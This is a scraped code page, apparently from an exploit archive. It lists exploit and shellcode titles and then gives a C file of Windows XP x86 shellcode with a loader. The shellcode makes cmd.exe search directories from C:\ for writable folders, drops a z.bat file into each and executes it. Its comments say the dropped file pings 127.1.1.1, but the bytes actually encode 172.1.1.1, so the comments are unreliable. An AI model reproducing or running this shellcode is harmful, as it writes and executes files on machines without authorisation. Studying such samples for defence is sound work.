880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
92 lines
No EOL
2.5 KiB
C
92 lines
No EOL
2.5 KiB
C
/*
|
|
# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
|
|
# Date: 26-02-2017
|
|
# Author: lu0xheap
|
|
# Platform: Win_x86
|
|
# Tested on: WinXP SP1
|
|
# Shellcode Size: 130 bytes
|
|
*/
|
|
|
|
/*
|
|
Description:
|
|
write & exec dir searcher
|
|
starts from C:\
|
|
If dir found then write, execute (ping 127.1.1.1) and exit
|
|
If Write/noexec dir found then continue
|
|
|
|
Tested on WinXP SP1 (77e6fd35;77e798fd)
|
|
i686-w64-mingw32-gcc shell.c -o golddgger.exe
|
|
|
|
Null-free version:
|
|
|
|
(gdb) disassemble
|
|
Dump of assembler code for function function:
|
|
=> 0x08048062 <+0>: pop ecx
|
|
0x08048063 <+1>: xor eax,eax
|
|
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
|
|
0x08048068 <+6>: push eax
|
|
0x08048069 <+7>: push ecx
|
|
0x0804806a <+8>: mov eax,0x77e6fd35
|
|
0x0804806f <+13>: call eax
|
|
0x08048071 <+15>: xor eax,eax
|
|
0x08048073 <+17>: push eax
|
|
0x08048074 <+18>: mov eax,0x77e798fd
|
|
0x08048079 <+23>: call eax
|
|
|
|
|
|
NULL-free shellcode (132 bytes):
|
|
|
|
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
|
|
"\x50\x51\xb8"
|
|
"\x35\xfd\xe6\x77" // exec
|
|
"\xff\xd0\x31\xc0\x50\xb8"
|
|
"\xfd\x98\xe7\x77" // exit
|
|
"\xff\xd0\xe8\xe2\xff\xff\xff"
|
|
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
|
|
"\x2f\x43\x20\x22\x28\x63\x64\x20"
|
|
"\x63\x3a\x5c" // C:\
|
|
"\x20\x26\x46\x4f\x52"
|
|
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
|
|
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
|
|
"\x20\x44\x4f\x20"
|
|
"\x65\x63\x68\x6f\x20"
|
|
"\x70\x69\x6e\x67\x20"
|
|
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
|
|
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
|
|
"\x61\x74\x22\x26\x28\x63\x61\x6c"
|
|
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
|
|
"\x62\x61\x74\x22\x26\x26\x65\x78"
|
|
"\x69\x74\x29\x29\x22";
|
|
|
|
*/
|
|
// NULL version (130 bytes):
|
|
|
|
char code[] =
|
|
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
|
|
"\x35\xfd\xe6\x77" // exec
|
|
"\xff\xd0\x31\xc0\x50\xb8"
|
|
"\xfd\x98\xe7\x77" // exit
|
|
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
|
|
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
|
|
"\x43\x20\x22\x28\x63\x64\x20"
|
|
"\x63\x3a\x5c" // C:\
|
|
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
|
|
"\x20\x2f\x72\x20\x25\x41\x20\x49"
|
|
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
|
|
"\x20\x65\x63\x68\x6f\x20\x70\x69"
|
|
"\x6e\x67\x20"
|
|
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
|
|
"\x3e\x22\x25\x41"
|
|
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
|
|
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
|
|
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
|
|
"\x26\x26\x65\x78\x69\x74\x29\x29"
|
|
"\x22\x00";
|
|
|
|
int main(int argc, char **argv)
|
|
|
|
{
|
|
int (*func)();
|
|
func = (int (*)()) code;
|
|
(int)(*func)();
|
|
} |